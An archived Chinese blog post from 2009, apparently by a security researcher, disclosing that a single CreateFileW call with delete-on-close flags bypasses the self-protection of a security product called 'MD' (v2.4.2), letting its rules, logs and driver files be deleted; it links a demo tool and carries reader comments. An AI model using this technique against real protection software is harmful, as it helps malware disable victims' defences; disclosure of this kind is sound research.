百度空间 | 百度首页 
 
查看文章
 
一行代码突破MD的文件保护
2009-10-30 13:38

昨天爆了一个通用的攻击技巧,其中提到了MD在这个攻击技巧上存在的漏洞,简单举了个可突破其文件保护的漏洞,来作为演示。作者今天早上根据我的帖子做了更新。不过要突破MD的文件保护,根本不需要这么高深的技巧,只需要一行代码就可以了(测试对2.4.2 final有效)

HANDLE hfile = CreateFileW(FilePath,DELETE,FILE_SHARE_READ | FILE_SHARE_WRITE,0,OPEN_EXISTING,   FILE_FLAG_DELETE_ON_CLOSE,0);

FilePath为任意要删除的MD文件,当然被加载和被运行的DLL,EXE不行,可以删除MD的规则、日志和核心驱动文件等。

这里提供一个DEMO程序,可选择任意要删除的MD被保护文件

http://mj0011.ys168.com 漏洞演示下mdvuln.rar


类别:默认分类 | 添加到搜藏 | 浏览() | 评论 (14)
 
最近读者:
 
网友评论:
1
2009-10-30 13:40 | 回复
shafa~
 
2
2009-10-30 13:51 | 回复
呵呵,继续找漏洞@!!!!完善MD
 
3
2009-10-30 14:03 | 回复
MJ你太狠了……
 
4
2009-10-30 14:14 | 回复
找找comodo。。。。。今天开机 开始疯狂给我弹病毒窗口   全是系统文件
 
5
2009-10-30 14:17 | 回复
太厉害了
可惜看不懂,竟然这么一句就行了。。
 
6
2009-10-30 14:27 | 回复
真服了,又找出个bug
 
7
2009-10-30 14:34 | 回复
真是强大,技术牛人啊,偶只能仰望。。。
 
8
2009-10-30 15:47 | 回复
怎么这么牛呢
 
9
2009-10-30 16:06 | 回复
呵呵,已经更新到2.4.3了,继续找bug?
 
10
2009-10-30 16:19 | 回复
坐观mj能破几次
不过有mj找bug对md也是件好事 谢谢了哈哈
 
11
2009-10-30 17:13 | 回复
MD是啥软件?
 
12
2009-10-30 17:39 | 回复
烧饼前来膜拜大牛
 
13
2009-10-30 19:44 | 回复
MJ 你以前空间那个音乐叫什么名字啊?谢谢
 
14
2009-11-11 23:39 | 回复
大牛前来膜拜 烧饼
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu